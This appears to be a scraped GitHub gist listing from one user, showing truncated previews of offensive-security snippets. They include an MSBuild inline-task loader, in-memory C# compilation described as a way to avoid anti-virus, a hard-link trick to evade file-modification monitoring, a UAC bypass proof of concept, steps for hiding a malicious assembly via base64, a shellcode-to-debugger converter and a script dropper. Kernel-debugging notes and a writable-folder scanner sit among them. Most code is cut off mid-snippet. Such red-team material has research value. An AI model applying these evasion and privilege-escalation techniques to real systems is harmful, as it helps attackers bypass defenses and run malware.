caseysmithrc / JankyAF.csproj
Created Jul 17, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
caseysmithrc / CompileInMemory.cs
Created Jul 8, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: However, this will still execute csc.exe and drop a dll to %temp%
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
class Program
caseysmithrc /
Last active Jul 22, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.


caseysmithrc / UserWritableLocations.ps1
Created Jul 4, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article:
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
caseysmithrc / UAC-dotnet-profiler-poc.ps1
Created Jul 2, 2019 — forked from clavoillotte/UAC-dotnet-profiler-poc.ps1
PoC of UAC bypass with a .NET profiler DLL
# Bypass UAC with a .NET profiler DLL
# GUID, path and content
$GUID = '{' + [guid]::NewGuid() + '}'
$DllPath = $env:TEMP + "\test.dll"
caseysmithrc / malicious.cs
Created Jun 15, 2019 — forked from Arno0x/malicious.cs
Hide malicious assembly in another one with RunTime code compiling
Author: Arno0x0x, Twitter: @Arno0x0x
Encode this source in base64:
base64 -w0 malicious.cs > malicious.b64
Then paste it in the code in "not_detected.cs" source file
caseysmithrc /
Created Jun 7, 2019 — forked from cji/
Steps to successfully debug the Windows kernel between 2 VMWare VMs

Open the debugger VM's .vmx file, delete the existing serial0 lines (used for printing, not needed), and add these lines:

serial0.present = "TRUE"
serial0.pipe.endPoint = "client"
serial0.fileType = "pipe"
serial0.yieldOnMsrRead = "TRUE"
serial0.tryNoRxLoss = "FALSE"
serial0.startConnected = "TRUE"
caseysmithrc /
Created Jun 7, 2019 — forked from 3xocyte/
shellcode to cdb.exe
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From:
src = open('shellcode', 'r')
sc =
copy = ";eb @$t0+"
caseysmithrc / dynwrapx.js
Created Jun 2, 2019
DynamicWrapperX Dropper - Code Registration Example
//Example Reference:
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version=""/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>';
var fso = new ActiveXObject("Scripting.FileSystemObject");
var dropPath = fso.GetSpecialFolder(2);
// Create Base64 Object, supports encode, decode
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac